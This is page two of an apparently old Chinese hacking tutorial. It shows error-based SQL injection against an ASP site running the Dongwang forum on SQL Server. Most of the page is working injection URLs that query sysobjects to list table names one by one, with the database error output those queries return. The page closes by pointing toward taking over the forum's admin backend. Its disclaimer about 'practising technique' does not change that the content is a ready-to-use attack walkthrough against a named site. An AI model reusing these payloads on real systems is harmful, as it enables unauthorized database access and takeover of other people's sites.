上一页 1 2 3 下一页

　　二.得到数据库表名

　　不出意外的话动网的各个表就存在于当前数据库01city中。

　　首先得到第一个表：
http://www.loveyou.com/type.ASP?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in(''))--
返回：[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'address' 转换为数据类型为 int 的列时发生语法错误。

　　好的，第一个表名出来了，为： address

　　继续，
http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in('address'))--

　　返回：

　　admin 第二个表名也出来了。依次类推， 提交：
http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in('address'，'admin',...))--

　　可以得到当前数据库中所有表名。

　　不一会儿，结果出来了， 表名好眼熟啊。

　　"address","admin","bbslink","bbsnews","board","user".........傻瓜都看的出这是动网的表。当然还有其它的一些表，我们不去管它。

　　接下来就好办了，也不要去猜字段了，我们打开自己的动网数据库看一下就知道了。 既然有了表名，字段名，那么，动网不就在你掌握之下了吗？ 但千万不要 drop table啊。 破坏就不好了。我们的目的是演练技术，提高水平。 好，那么，我们去得到动网的后台。

上一篇： ASP做象资源管理器的树形目录
下一篇： 用asp写个简单的加密和解密的类

上一页 1 2 3 下一页